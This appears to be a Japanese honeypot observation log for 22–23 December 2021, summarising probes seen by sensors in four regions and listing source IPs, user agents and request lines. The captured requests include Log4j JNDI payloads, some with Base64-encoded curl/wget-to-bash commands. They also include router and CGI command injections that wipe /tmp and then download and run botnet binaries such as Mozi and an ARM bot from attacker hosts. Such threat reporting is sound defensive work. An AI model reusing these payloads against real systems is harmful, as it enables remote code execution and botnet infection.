ハニーポット(仮) 観測記録 2021/12/23分です。
特徴
共通
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
/.envへのスキャン行為
Location:JP
curlによるスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
110.242.68.4に関する不正通信
を確認しました。
Location:US
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
5.188.210.227に関する不正通信
を確認しました。
/shellに対する以下のアクセスを確認しました。
168.62.174.168 - - [22/Dec/2021:06:38:40 +0900] "GET /shell?cd+/tmp; rm+-rf+*; wget+ 212.192.216.45/bins/arm; chmod+777+/tmp/arm; sh+/tmp/arm+selfrep.jaws
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Joomla!の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2019-2725)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2020-14882,CVE-2020-14883,CVE-2020-14750)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
Laravelへのスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:113 (前日比:11)
US:総アクセス数:60 (前日比:-154)
UK:総アクセス数:158 (前日比:-70)
SG:総アクセス数:307 (前日比:163)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 2.57.122.62 | Romania |
| 1 | 3.80.3.186 | United States |
| 3 | 3.239.174.91 | United States |
| 1 | 4.17.224.131 | United States |
| 1 | 18.205.185.214 | United States |
| 2 | 20.106.243.122 | United States |
| 1 | 20.119.36.92 | United States |
| 2 | 20.191.87.81 | United States |
| 1 | 27.224.136.54 | China |
| 1 | 27.224.137.234 | China |
| 1 | 34.86.35.2 | United States |
| 1 | 36.5.159.32 | China |
| 1 | 43.129.40.155 | Singapore |
| 1 | 45.61.188.2 | United States |
| 8 | 47.252.36.134 | United States |
| 1 | 49.113.99.62 | China |
| 15 | 51.107.183.237 | United Kingdom |
| 1 | 51.158.156.78 | France |
| 1 | 52.194.193.141 | United States |
| 1 | 61.219.11.151 | Taiwan |
| 7 | 100.26.250.76 | United States |
| 1 | 103.133.110.200 | Vietnam |
| 1 | 106.45.9.187 | China |
| 14 | 107.172.73.224 | United States |
| 1 | 109.237.103.123 | Russia |
| 1 | 110.167.215.44 | China |
| 1 | 112.66.106.89 | China |
| 12 | 135.125.217.54 | France |
| 1 | 143.110.227.92 | United States |
| 1 | 143.198.55.184 | United States |
| 3 | 143.198.108.104 | United States |
| 2 | 157.245.70.127 | United States |
| 1 | 159.223.152.187 | United States |
| 1 | 159.223.169.4 | United States |
| 1 | 165.232.137.148 | United States |
| 1 | 171.116.47.53 | China |
| 1 | 174.138.13.119 | United States |
| 1 | 176.97.70.122 | United Kingdom |
| 3 | 185.254.196.217 | Ukraine |
| 5 | 185.254.196.218 | Ukraine |
| 1 | 205.185.120.201 | United States |
| 1 | 205.185.122.184 | United States |
| 1 | 205.185.123.61 | United States |
| 1 | 209.17.97.90 | United States |
| 1 | 209.141.50.223 | United States |
| 1 | 209.141.53.127 | United States |
| 1 | 212.154.7.246 | Turkey |
| 1 | 220.200.177.176 | China |
| 1 | 221.199.187.100 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 24 | - |
| 1 | Chrome/54.0 (Windows NT 10.0) |
| 1 | MMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24 |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| 1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) |
| 1 | Mozilla/5.0 (Linux; U; Android-4.0.3; en-us; Xoom Build/IML77) AppleWebKit/535.7 (KHTML, like Gecko) CrMo/16.0.912.75 Safari/535.7 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14 |
| 5 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
| 14 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 YaBrowser/19.7.2.516 Yowser/2.5 Safari/537.36 |
| 49 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 4 | Mozilla/5.0 (compatible;) |
| 1 | Mozilla/5.0 (iPad; CPU OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1 |
| 1 | Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox |
| 1 | Mozilla/5.01678543 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11 |
| 3 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
| 2 | curl/7.75.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x16\x03\x01\x01\xfa\x01 |
||
| 2 | \x16\x03\x01\x02 |
||
| 3 | \x16\x03\x01 |
||
| 1 | CONNECT | cn[.]bing[.]com:443 |
HTTP/1.1 |
| 1 | CONNECT | www[.]baidu[.]com:443 |
HTTP/1.1 |
| 1 | CONNECT | www[.]voanews[.]com:443 |
HTTP/1.1 |
| 1 | GET | /${jndi:ldap://192[.]46[.]216[.]224:1389/Exploit} |
HTTP/1.1 |
| 50 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /HNAP1 |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /admin/images/demo-image.jpg |
HTTP/1.1 |
| 2 | GET | /app/.env |
HTTP/1.1 |
| 1 | GET | /application/application.ini |
HTTP/1.1 |
| 1 | GET | /application/configs/application.ini |
HTTP/1.1 |
| 2 | GET | /blob/.env |
HTTP/1.1 |
| 1 | GET | /blog/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /clover/gui/login.jsf |
HTTP/1.1 |
| 1 | GET | /cms/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /evox/about |
HTTP/1.1 |
| 2 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /gameConfig.js?v=1640163559759 |
HTTP/1.1 |
| 1 | GET | /js/index.js |
HTTP/1.1 |
| 2 | GET | /laravel/.env |
HTTP/1.1 |
| 1 | GET | /linear-swap-ex/market/depth?contract_code=BTC-USDT&type=step0 |
HTTP/1.1 |
| 2 | GET | /maintenances |
HTTP/1.1 |
| 1 | GET | /news/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /pages/createpage-entervariables.action?SpaceKey=x |
HTTP/1.1 |
| 1 | GET | /phpmyadmin/ |
HTTP/1.1 |
| 1 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /site/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /sito/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /template/desktop/js/vlxx.js?v=2 |
HTTP/1.1 |
| 1 | GET | /test/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /text4041640133560 |
HTTP/1.1 |
| 2 | GET | /vendor/laravel/.env |
HTTP/1.1 |
| 1 | GET | /web/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /website/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /wordpress/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /wp/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /wp1/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 1 | GET | /wp2/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
| 2 | GET | /xmlrpc.php?rsd |
HTTP/1.1 |
| 1 | GET | http[:]//dongtaiwang[.]com/ |
HTTP/1.1 |
| 1 | GET | http[:]//www[.]epochtimes[.]com/ |
HTTP/1.1 |
| 1 | GET | http[:]//www[.]minghui[.]org/ |
HTTP/1.1 |
| 1 | GET | http[:]//www[.]rfa[.]org/english/ |
HTTP/1.1 |
| 1 | GET | http[:]//www[.]soso[.]com/ |
HTTP/1.1 |
| 1 | HEAD | http[:]//110[.]242[.]68[.]4/ |
HTTP/1.1 |
| 1 | POST | /result%3Fhl%3Den%26meta%3Dvvnwppnloxhwtqccppbyhqmrwyswqen |
HTTP/1.1 |
| 1 | POST | /sdk |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 2 | 5.157.38.50 | United States |
| 4 | 23.101.130.130 | United States |
| 2 | 23.146.240.233 | United States |
| 1 | 45.61.188.222 | United States |
| 6 | 51.79.29.48 | Canada |
| 1 | 103.133.109.163 | Vietnam |
| 2 | 107.172.4.214 | United States |
| 1 | 107.173.222.173 | United States |
| 1 | 107.189.8.243 | United States |
| 1 | 117.194.167.185 | India |
| 1 | 117.251.57.210 | India |
| 1 | 120.85.115.168 | China |
| 7 | 137.184.221.114 | United States |
| 2 | 146.56.131.161 | Japan |
| 1 | 159.223.169.4 | United States |
| 1 | 159.223.169.7 | United States |
| 4 | 164.52.24.179 | China |
| 1 | 178.72.77.66 | Russia |
| 1 | 185.162.235.164 | Russia |
| 1 | 185.220.100.250 | Germany |
| 6 | 193.169.255.14 | Poland |
| 7 | 195.54.160.149 | Russia |
| 1 | 198.98.49.124 | United States |
| 1 | 205.185.117.154 | United States |
| 1 | 209.17.96.26 | United States |
| 2 | 209.141.50.223 | United States |
| 1 | 209.141.55.121 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo} |
| 8 | - |
| 1 | Go-http-client/1.1 |
| 1 | Hello, World |
| 1 | Mozilla/5.0 (Linux; Android 6.0; MYA-L23 Build/HUAWEIMYA-L23) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 |
| 1 | Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; Nexus S Build/GRJ22) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 DMBrowser-BV |
| 6 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:40.0) Gecko/20100101 Firefox/40.0 |
| 1 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9 |
| 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 |
| 24 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 4 | Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x16\x03\x01\x01 |
\x01 | |
| 4 | \x16\x03\x01 |
||
| 1 | GET | /${jndi:ldap://142[.]93[.]172[.]227:1389/Exploit} |
HTTP/1.1 |
| 1 | GET | /${jndi:ldap://192[.]46[.]216[.]224:1389/Exploit} |
HTTP/1.1 |
| 22 | GET | /.env |
HTTP/1.1 |
| 1 | GET | //board[.]cgi?cmd=wget%20http%3A%2F%2F139[.]162[.]43[.]211%2Fassailant.arm7 |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /?s=${jndi:ldap://142[.]93[.]172[.]227:1389/Exploit} |
HTTP/1.1 |
| 1 | GET | /?s=${jndi:ldap://192[.]46[.]216[.]224:1389/Exploit} |
HTTP/1.1 |
| 1 | GET | /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo} |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /admin/images/demo-image.jpg |
HTTP/1.1 |
| 1 | GET | /api/productConfig |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
| 3 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /etc/passwd |
HTTP/1.1 |
| 1 | GET | /examples/ |
HTTP/1.1 |
| 1 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /gameConfig.js?v=1640163559759 |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /js/index.js |
HTTP/1.1 |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /myjsp.jsp |
HTTP/1.1 |
| 1 | GET | /template/desktop/js/vlxx.js?v=2 |
HTTP/1.1 |
| 2 | POST | /.env |
HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
| 2 | POST | /HNAP1/ |
HTTP/1.0 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 2 | PUT | /myjsp.jsp/ |
HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 3 | 2.57.122.62 | Romania |
| 1 | 3.87.123.226 | United States |
| 1 | 5.188.210.227 | Russia |
| 1 | 23.101.185.44 | United States |
| 1 | 23.251.102.82 | United States |
| 1 | 31.207.47.5 | Netherlands |
| 1 | 43.131.66.209 | Singapore |
| 1 | 45.61.185.22 | United States |
| 1 | 45.61.185.177 | United States |
| 1 | 45.61.188.112 | United States |
| 1 | 45.61.188.176 | United States |
| 2 | 45.130.83.93 | Netherlands |
| 8 | 47.252.8.150 | United States |
| 2 | 89.248.165.23 | United Kingdom |
| 2 | 94.232.43.63 | Russia |
| 1 | 109.237.103.123 | Russia |
| 1 | 120.85.116.199 | China |
| 1 | 123.129.134.251 | China |
| 2 | 157.245.70.127 | United States |
| 4 | 164.52.24.179 | China |
| 2 | 164.52.53.163 | China |
| 1 | 167.71.175.10 | United States |
| 1 | 168.62.174.168 | United States |
| 1 | 170.210.45.163 | Argentina |
| 1 | 176.123.1.66 | Moldova |
| 1 | 185.220.101.150 | Germany |
| 1 | 190.180.154.70 | Argentina |
| 9 | 195.54.160.149 | Russia |
| 1 | 198.98.49.124 | United States |
| 1 | 205.185.117.203 | United States |
| 1 | 209.17.96.82 | United States |
| 101 | 211.23.45.27 | Taiwan |
| 1 | 222.140.185.48 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 20 | - |
| 1 | Chrome/54.0 (Windows NT 10.0) |
| 1 | Mozilla/5.0 (Linux; Android 7.0; BLL-L22 Build/HUAWEIBLL-L22) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 |
| 2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2 |
| 101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 |
| 3 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko) |
| 4 | Mozilla/5.0 (compatible;) |
| 1 | Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1 |
| 4 | Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox |
| 2 | curl/7.75.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 5 | \x03 |
||
| 1 | \x16\x03\x01\x01 |
\x01 | |
| 2 | \x16\x03\x01\x02 |
||
| 5 | \x16\x03\x01 |
||
| 2 | GET | /${jndi:ldap://185[.]246[.]87[.]50:1389/Exploit} |
HTTP/1.1 |
| 1 | GET | /${jndi:ldap://192[.]46[.]216[.]224:1389/Exploit} |
HTTP/1.1 |
| 4 | GET | /.env |
HTTP/1.1 |
| 3 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /?s=${jndi:ldap://192[.]46[.]216[.]224:1389/Exploit} |
HTTP/1.1 |
| 1 | GET | /HNAP1 |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /admin/images/demo-image.jpg |
HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /evox/about |
HTTP/1.1 |
| 3 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /fuel |
HTTP/1.1 |
| 1 | GET | /gameConfig.js?v=1640163559759 |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /js/index.js |
HTTP/1.1 |
| 101 | GET | /phpmyadmin/ |
HTTP/1.1 |
| 1 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//190[.]180[.]154[.]70:46540/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws |
|
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | GET | /template/desktop/js/vlxx.js?v=2 |
HTTP/1.1 |
| 1 | GET | /text4041640180307 |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | http[:]//5[.]188[.]210[.]227/echo.php |
HTTP/1.1 |
| 1 | HEAD | / |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 3 | POST | /HNAP1/ |
HTTP/1.0 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 1 | POST | /sdk |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.55.53.144 | United States |
| 1 | 20.82.120.146 | United States |
| 1 | 23.183.82.218 | United States |
| 1 | 23.183.83.160 | United States |
| 1 | 23.251.102.82 | United States |
| 1 | 27.193.190.241 | China |
| 1 | 31.207.47.5 | Netherlands |
| 101 | 43.224.4.208 | Hong Kong |
| 2 | 45.67.221.63 | Germany |
| 8 | 47.252.40.145 | United States |
| 6 | 51.79.29.48 | Canada |
| 1 | 51.158.156.78 | France |
| 1 | 52.194.193.141 | United States |
| 1 | 65.112.30.162 | United States |
| 1 | 90.209.158.220 | United Kingdom |
| 1 | 96.11.216.106 | United States |
| 1 | 104.244.73.9 | United States |
| 1 | 109.237.103.123 | Russia |
| 1 | 111.92.78.162 | India |
| 1 | 115.144.122.25 | South Korea |
| 1 | 115.144.166.80 | South Korea |
| 25 | 119.28.114.205 | China |
| 1 | 144.126.209.23 | United States |
| 1 | 147.182.169.69 | United States |
| 2 | 157.230.216.203 | United States |
| 1 | 159.223.161.190 | United States |
| 1 | 159.223.161.250 | United States |
| 9 | 163.172.161.118 | United Kingdom |
| 3 | 163.172.168.251 | United Kingdom |
| 1 | 164.52.53.163 | China |
| 1 | 165.232.137.148 | United States |
| 1 | 165.232.142.210 | United States |
| 1 | 170.187.155.78 | United States |
| 8 | 185.254.196.223 | Ukraine |
| 101 | 189.132.4.144 | Mexico |
| 9 | 195.54.160.149 | Russia |
| 4 | 198.20.87.98 | United States |
| 1 | 198.98.49.124 | United States |
| 1 | 209.17.97.98 | United States |
| 1 | 209.141.48.235 | United States |
| 1 | 209.141.53.105 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo} |
| 42 | - |
| 1 | Java/1.8.0_311 |
| 1 | Mozila/5.0 |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0) |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0 |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6; rv:54.0.1) Gecko/20100101 Firefox/54.0.1 |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4; rv:52.7.2) Gecko/20100101 Firefox/52.7.2 |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1; rv:60.5.2) Gecko/20100101 Firefox/60.5.2 |
| 202 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 |
| 1 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Linux i686 on x86_64; rv:54.0) Gecko/20100101 Firefox/54.0 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F |
| 23 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 4 | Mozilla/5.0 (compatible;) |
| 1 | Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/21.4.141508723 Mobile/14C92 Safari/600.1.4 |
| 1 | Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox |
| 1 | \"Mozilla/5.0 |
| 2 | curl/7.75.0 |
| 1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1127.el7.x86_64 |
| 1 | wget |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x03 |
||
| 2 | \x16\x03\x01\x01\x9d\x01 |
||
| 4 | \x16\x03\x01\x01\xa7\x01 |
||
| 2 | \x16\x03\x01\x01\xb4\x01 |
||
| 3 | \x16\x03\x01\x02 |
||
| 7 | \x16\x03\x01 |
||
| 2 | \x16\x03\x02\x01\x9a\x01 |
||
| 2 | \x16\x03\x03\x01H\x01 |
||
| 2 | \x16\x03\x03\x01V\x01 |
||
| 2 | \x16\x03\x03\x01\x99\x01 |
||
| 4 | \x16\x03\x03\x01\xa5\x01 |
||
| 1 | CONNECT | orangetv[.]orange[.]es:443 |
HTTP/1.1 |
